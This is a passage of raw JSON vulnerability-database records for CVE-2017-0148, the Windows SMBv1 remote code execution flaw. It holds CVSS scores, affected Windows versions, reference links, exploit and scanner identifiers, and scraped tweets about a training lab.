"cpeConfiguration"}, {"hash": "3f9465465d68d8a7f86e1cb1f3804b2c", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6a3356b5136599746533482cee29bc14", "key": "title"}, {"hash": "dc7888ec5bcb36228c71cf6f35f01dee", "key": "references"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a142b7b1b3b74c6f44646072d5968b9a", "key": "description"}, {"hash": "b99edf73073813cd4c0252d2eb2a41b1", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "id": "CVE-2017-0148", "lastseen": "2020-09-21T14:31:16", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "http://www.securitytracker.com/id/1037991", "http://www.securityfocus.com/bid/96706", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0148", "type": "cve", "viewCount": 50}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:31:16"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0148"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:16:45", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-05-29T18:16:45", "value": 9.3, "vector": "NONE"}}, "hash": "57b0cc9ed029173923d60e8e0cfc19ee6b231a39f0980bb02ec23ed90a332753", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "540a95c757910d6283d1dec5d9025be0", "key": "references"}, {"hash": "3f9465465d68d8a7f86e1cb1f3804b2c", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6a3356b5136599746533482cee29bc14", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a142b7b1b3b74c6f44646072d5968b9a", "key": "description"}, {"hash": "b99edf73073813cd4c0252d2eb2a41b1", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "id": "CVE-2017-0148", "lastseen": "2019-05-29T18:16:45", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "http://www.securitytracker.com/id/1037991", "http://www.securityfocus.com/bid/96706", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0148", "type": "cve", "viewCount": 0}, "differentElements": ["references"], "edition": 1, "lastseen": "2019-05-29T18:16:45"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0148"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:30", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2021-02-02T06:36:30", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2021-02-02T06:36:30", "rev": 2, "value": 9.3, "vector": "NONE"}, "twitter": {"counter": 55, "modified": "2021-02-02T06:36:30", "tweets": [{"link": "https://twitter.com/Hobbes85ae1/status/1384683091181047808", "text": "Blue - I have just completed this room! Check it out: https://t.co/lqz4GMSKMq?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/jblanko1984/status/1382343441040936960", "text": "Blue - I have just completed this room! Check it out: https://t.co/JR1xhzqLZN?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/dwambia/status/1381683825042931712", "text": "Blue - I have just completed this room! Check it out: https://t.co/6qcJuSTklT?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Cameron16996962/status/1385269426321231876", "text": "Brute It - I have just completed this room! Check it out: https://t.co/P0vO3cuyJm?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/bruteit?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/ihoruhe/status/1381730384447213573", "text": "Blue - I have just completed this room! Check it out: https://t.co/0vHkuPlF0m?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/yellephen/status/1373222110034759681", "text": "Blue - I have just completed this room! Check it out: https://t.co/WbveSWg8dJ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/chittomodekinai/status/1376211737238626307", "text": "Blue - I have just completed this room! Check it out: https://t.co/ztz5xEd3UX?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/CoolHandSquid/status/1382098669852372992", "text": "Blue - I have just completed this room! Check it out: https://t.co/zCwRy6GPJf?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/_nabeen/status/1381922890770042887", "text": "\u307e\u3060writeup\u307f\u306a\u3044\u3068\u30c0\u30e1\u306d\n\nBlue - I have just completed this room! Check it out: https://t.co/jAlK4M1Ntn?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/BELKHIRIKhired1/status/1383176994536456201", "text": "Blue - I have just completed this room! Check it out: https://t.co/eoVe5ak68d?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [{"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "96706", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96706"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148"}], "hash": "55af1a6ca6e2ef71201d17b5ec2f2e4040f04ac85fbb8d337cbe70569afddce8", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "3f9465465d68d8a7f86e1cb1f3804b2c", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6a3356b5136599746533482cee29bc14", "key": "title"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "dc7888ec5bcb36228c71cf6f35f01dee", "key": "references"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bdb1fd133bbc616329b17a26e814341c", "key": "extraReferences"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a142b7b1b3b74c6f44646072d5968b9a", "key": "description"}, {"hash": "b99edf73073813cd4c0252d2eb2a41b1", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "id": "CVE-2017-0148", "immutableFields": [], "lastseen": "2021-02-02T06:36:30", "modified": "2018-06-21T01:29:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "http://www.securitytracker.com/id/1037991", "http://www.securityfocus.com/bid/96706", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0148", "type": "cve", "viewCount": 63}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:36:30"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": 